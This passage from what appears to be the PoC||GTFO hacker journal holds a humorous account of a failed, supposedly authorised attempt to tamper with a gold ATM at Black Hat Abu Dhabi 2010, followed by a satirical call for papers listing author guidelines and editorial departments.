Perhaps you will see this as an opportunity to go on a quest of ELF-discovery and be able to take this
work to the next level. If you do discover a path to argument control, we hope you will take the time to
share your thoughts with the wider community.

Peace out, and may the Manul always be with you.
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6 GTFO or #FAIL 



by FX of Phenoelit 

To honor the memory of the great Barnaby Jack, we would like to relate the events of a failed POC. It 
happened on the second day of the Black Hat Abu Dhabi conference in 2010 that the hosts, impressed by 
Barnaby's presentation on ATMs,^^ pointed out that the Emirates Palace hotel features a gold ATM^^. So 
they asked him to see if he could hack that one too. 

Never one to reject challenges or fun to be had, Barns gathered a bunch of fellow hackers, who shall 
remain anonymous in this short tale, to accompany him to the gold ATM. Sufficient to say, yours truly was 
among them. Thus it happened that a bunch of hackers and a number of hosts in various white and pastel 
colored thawbs went to pay the gold ATM a visit. Our hosts had assured everyone in the group that it was 
totally OK for us to hack the machine, as long as they were with us. 

6.1 The POC 

While the gold ATM, being plated with gold itself, looked rather solid,[3] a look at the back of the machine 
revealed a messy knot of cables, the type of wiring normally found on a Travis Goodspeed desk. Since the 
machine updates the gold pricing information online, we obviously wanted to have a look at the traffic. We 
therefore disconnected the flimsy network connections and observed the results, of which there were initially 
none to be observed, except for the machine to start beeping in an alarming way. 

Nothing being boring, we decided to power cycle the machine and watch it boot. For that, yours truly 
got behind it and used his considerable power cable unplugging skills to their fullest extent. Interestingly 
enough, the gold ATM stayed operational, obviously being equipped with the only Uninterruptable Power 
Source (UPS) in the world that actually provides power when needed. 

Reappearing from behind the machine, happily holding the unplugged network and power cables, yours 
truly observed the group of hosts being already far away and the group of hackers following close behind. 
Inverting their vector of movement, the cause of the same became obvious with the approaching storm 
troopers of Blackwater quality and quantity. Therefore, yours truly joined the other hackers at considerable 
speed. 

6.2 The FAIL 

Needless to say, what followed was a tense afternoon of drinking, waiting, and considering exit scenarios from 
a certain country, depending on individual citizenships, while powers to be were busy turning the incident 
into a non-issue. 

The #FAIL was quickly identified as the inability of the fellowship of hackers to determine rank and 
therefore authority of people that all wear more or less the same garments. What had happened was that 
the people giving authority to hack the machine actually did not possess said authority in the first place or, 
alternatively, had pissed off someone with more authority. 

The failed POC pointed out the benefits of western military uniforms and their rank insignia quite clearly. 

6.3 Neighborly Greetings 

Neighborly greetings are in order to Mr. Nils, who, upon learning about the incident, quietly handed the 
local phone number of the German embassy to yours truly. 



[1] https://www.blackhat.com/html/bh-ad-10/bh-ad-10-archives.html#Jack 

[2] http://www.nydailynews.com/2.1353/abu-dhabi-emirates-palace-hotel-sports-vending-machine-gold-article-1.449348 

[3] http://www.gold-to-go.com/en/company/history/ 
7 A Call for PoC 



by Rt. Revd. Pastor Manul Laphroaig 

We stand, sit, or simply relax and chill on the shoulders of the giants, Phrack and Uninformed. They 
pushed the state-of-the-art forward mightily with awesome, deep papers and at times even with poetry to 
match. And when a single step carries you forward by a measure of academic years, it's OK to move slowly. 

But for the rest of us dwarves, running around or lounging on those broad shoulders can be so much fun! 
A hot PoC is fun to toss to a neighbor, and who knows what some neighbor will cook up with it for the 
shared roast of the vuln-beast? A neighbor might think, "my PoC is unexploitable" or "it is too simple," 
but verily I tell you, one neighbor's PoC is the missing cog for another neighbor's 0day. How much PoC is 
hoarded and lies idle while its matching piece of PoC wastes away in another hoard? Let's find out! 



7.1 Author guidelines 

It is easy to prepare your paper for submission to IJPoC||GTFO in seven easy steps. 

1. If you have a section called Introduction or some such nonsense, replace it with a two-sentence statement 
of why the reader who doesn't care about the subject after reading your abstract should care, and a 
link to a good tutorial. Some caring neighbor must have spent a great deal of effort writing it already, 
and who needs a hundred little one-pagers, all alike, on top of that? 

2. If you have a section called Motivation, see item 1. 

3. Scan your paper for tables. If you find a table, replace it with an equivalent piece of code. Repeat. 
This is important. 

4. Scan your paper for diagrams of the boxes-and-arrows kind. Unless the boxes are code basic blocks, 
there had better be text on the arrows detailing exactly what is being sent on that arrow. If in doubt, 
replace with equivalent code. 

5. If you have a section called Related work, replace it with a neighborly Howdy to neighbors who did 
that work, and cite it in the text of your paper that it's related to. 

6. If you have a section called Conclusion, replace it with a Howdy to neighbors who care. They have 
already read your paper and need not be told what they just read. 

7. Make up and apply the remaining steps in the spirit of the above, and may the Pastor or his trusty 
Editor smile upon your submission! 



7.2 Other Departments 

For the proper separation of the goats and the lambs, there shall be various Departments. Each Department 
shall have an Editor, excepting those that shall have two or more, so that they may fight with each other over 
Important Decisions, and neighbors far and wide shall not be denied a proper helping of Hacker Drama.[4] 

Editor at Large: Rt. Revd. Pastor M.L. 
Dept. of Bringing APT Home: Cultural attache of the 41st Directorate 
Dept. of Fail: FX of Phenoelit 
Ethics Board: The Grugq 
Dept. of Busting BS: pipacs 
Poet Laureate: Ben Nagy[5] 
Dept. of Rejections: Academic Refugee 
Dept. of Drama: Xbf 
Dept. of PHY: Michael Ossmann 



[4] All such Drama will be helpfully documented under the /drama/ URL, which is the practice we respectfully recommend to 
all other esteemed venues. 
Bullshit Busting Department. Remember that feeling when you are reading a paper and come to a 
table or graph that just makes you wonder if bovine excreta have been used in its production? Well neighbors, 
wonder no more, but send it to us and trust our world-renowned experts to call it out right and proper! 

Rejected-from: Department of Rejections. The Pastor admonishes us, "Read the Fucking Paper!" 
and sometimes also, "Write the Fucking Paper!" So even though sharing a drink, a story, and a hack with a 
neighbor is still the most efficient method of knowledge transmission,[6] diligent neighbors also write papers. 
And when a paper is written, why not enter it into the lottery otherwise known as the Academic Conference 
Peer Review Process? 

The process goes thusly: first you submit a paper, then you receive a rejection, along with the collectible 
essays called Reviews. Sometimes these little pieces of text have little to do with your paper, but mostly 
they explain how reviewers misunderstood what you had to say, and how they couldn't care less. The art 
of Reviewing is ancient, and goes back to ritual insults that rivals bellowed at each other before or instead 
of battle. Although not all Reviewers take their art seriously, occasionally they manage to plumb the true 
depths of trolling. In the words of the Pastor, "If you stand under the Ivory Tower long enough, you will 
never want for fertilizer." 

The neighbor who collects the most creatively insulting Reviews wins. Submissions will be judged by our 
Editors, and best ones will receive prizes. 



[5] If you don't trust our taste, read Ben's masterpiece https://lists.immunityinc.com/pipermail/dailydave/2012-August/000187.html, and judge for yourself! 

[6] For in-depth discussion, see [PXE] http://ph-neutral.darklab.org/PXE.txt and [PXE2] http://ph-neutral.darklab.org/PXE2.txt 